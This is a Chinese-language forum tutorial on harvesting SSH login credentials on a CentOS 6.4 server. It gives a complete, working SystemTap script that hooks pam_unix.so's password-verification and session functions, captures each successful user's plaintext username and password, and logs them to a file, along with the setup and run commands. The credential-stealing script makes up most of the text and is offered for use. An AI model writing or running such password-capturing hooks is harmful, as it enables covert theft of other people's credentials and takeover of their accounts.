centos6.x 抓取ssh登陸的用戶名和密碼

systemtap是一款很是強大內核調試工具，能夠debug不少關於kernel層的問題。Linux是經過PAM模塊檢測用戶信息和認證信息的，從而肯定一個用戶是否能夠登陸系統，利用這個知識點，使用systemtap捕獲一下pam_unix.so該動態庫文件的函數調用，得到用戶在ssh遠程登陸時的用戶名和密碼吧。

測試環境：CentOS6.4 32bit

內核版本：2.6.32-358.el6.i686

首先安裝如下rpm包
yum --releasever=6.4 update

yum install -y systemtap

debuginfo-install $(rpm -qf /lib/security/pam_unix.so)

建立文件，寫入如下代碼
touch /root/capture_pass.stp

· #!/usr/bin/stap 

· global username, pass, isSuccRet = 1;

· probe process("/lib/security/pam_unix.so").function("_unix_verify_password")

· {

· username = user_string($name);

· pass = user_string($p);

· }

· probe process("/lib/security/pam_unix.so").function("_unix_verify_password").return

· {

· if ($return == 0)

· {

· printf("User: %s\nPassword: %s\n\n", username, pass);

· isSuccRet = 0;

· }

· }

· probe process("/lib/security/pam_unix.so").function("pam_sm_open_session")

· {

· if (isSuccRet != 0)

· {

· printf("Login via ssh service.\n\User: %s\nPassword: %s\n\n", username, pass);

· }

· isSuccRet = 1;

· }

賦予可執行權限
chmod +x capture_pass.stp
建立一個記錄密碼的文件
touch password.txt
執行systemstap腳本
stap capture_pass.stp -o password.txt

本地執行capture_pass.stp腳本，同時ssh遠程登陸系統，即便第一次登陸失敗也沒有問題，不會記錄嘗試輸入的錯誤密碼。登陸成功後ctl+C終止腳本運行，查看password.txt，成功捕獲。systemstap很強大的利器，因此只有超戶能夠使用。

來自：https://forum.90sec.org